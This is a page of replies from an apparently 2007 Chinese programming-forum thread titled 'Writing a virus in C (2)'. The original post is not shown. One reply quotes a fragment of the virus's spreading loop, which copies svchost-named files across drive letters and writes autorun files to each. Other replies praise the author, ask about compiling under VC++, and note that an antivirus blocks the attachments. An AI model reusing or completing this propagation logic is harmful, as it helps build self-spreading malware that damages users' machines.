| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 15898 人关注过本帖, 18 人收藏
标题:[原创]用C语言写病毒(2)
只看楼主 加入收藏
crazyboy216
Rank: 1
等 级:新手上路
帖 子:62
专家分:0
注 册:2007-6-28
收藏
得分:0 

我对windows系统还不怎么了解哦,系统的核心功能是哪些文件,windows系统首先会启动那些进程.....楼主有没有这方面的资料.有的话塞我一份zhoubo_216@163.com谢谢
我觉得这个程序中有个地方设计的很好(至少对我来说,我又长见识了,呵呵)
for(k=0;k<24;k++)
{
copy(files_svchost[i],temp[0]);
if((output=fopen(temp[1],"w"))!=NULL)
{
fprintf(output,"%s",autorun);
fclose(output);
}
temp[0][0]++;
temp[1][0]++;

}
i=SVCHOST_NUM;
}
这个temp数组真的好,不像病毒1中的那么死板.


2007-08-03 11:07
jianweichief
Rank: 1
等 级:新手上路
帖 子:80
专家分:0
注 册:2007-7-18
收藏
得分:0 
原来是高手啊

2007-08-03 17:14
cbird
Rank: 1
等 级:新手上路
帖 子:19
专家分:0
注 册:2007-8-5
收藏
得分:0 
具有如此多功能,难免被歹人利用啊~

我是菜鸟,经常会拉些“鸟屎”在这里: http://hi.baidu.com/cbirdfly 欢迎品尝^_^
2007-08-05 13:32
leejevons
Rank: 1
等 级:新手上路
帖 子:1
专家分:0
注 册:2007-8-4
收藏
得分:0 
回复:(卧龙孔明)[原创]用C语言写病毒(2)


来世,我不会再爱任何人,因为,今生爱你,已把我所有轮回的情和痴耗尽
2007-08-05 13:40
Gramary
Rank: 4
等 级:贵宾
威 望:13
帖 子:769
专家分:0
注 册:2007-7-9
收藏
得分:0 
我狂顶! 牛逼``
我看不习惯C语言的语法了
搞JAVA搞多了`

学编程不能急,要慢慢来。
2007-08-05 15:28
小野猫
Rank: 1
等 级:新手上路
帖 子:53
专家分:0
注 册:2007-7-13
收藏
得分:0 

有这么牛逼!!!
传说中的孔明?


2007-08-05 16:38
一笔苍穹
Rank: 1
等 级:新手上路
帖 子:640
专家分:0
注 册:2006-5-25
收藏
得分:0 
以下是引用veler在2007-6-18 15:21:45的发言:
值得顶一下
记得上次了也是你一样
在论坛了了一次 我看了看你的代码 说实话看不懂
现在看来也不太懂
可以在vc++下面编译吗

稍作改动就可以的。

2007-08-10 10:28
vfdff
Rank: 6Rank: 6
等 级:侠之大者
威 望:8
帖 子:2172
专家分:425
注 册:2005-7-15
收藏
得分:0 
回复:(卧龙孔明)[原创]用C语言写病毒(2)
附件不能下呀 @全部被我的杀毒软件阻止了

~~~~~~~~~~~~~~~好好学习~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2007-08-12 18:16
卧龙孔明
Rank: 9Rank: 9Rank: 9
等 级:贵宾
威 望:59
帖 子:3872
专家分:684
注 册:2006-10-13
收藏
得分:0 
以下是引用vfdff在2007-8-12 18:16:24的发言:
附件不能下呀 @全部被我的杀毒软件阻止了

什么杀毒软件?
除非有人上报了杀毒软件商,否则不会被杀


My Blog: www.aiexp.info
虽然我的路是从这里开始的,但是这里不再是乐土.感谢曾经影响过,引导过,帮助过我的董凯,飞燕,leeco,starwing,Rockcarry,soft_wind等等等等.别了,BCCN.
2007-08-12 18:19
vfdff
Rank: 6Rank: 6
等 级:侠之大者
威 望:8
帖 子:2172
专家分:425
注 册:2005-7-15
收藏
得分:0 
卡巴斯基 6.0

~~~~~~~~~~~~~~~好好学习~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2007-08-12 18:22
快速回复:[原创]用C语言写病毒(2)
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.021917 second(s), 7 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved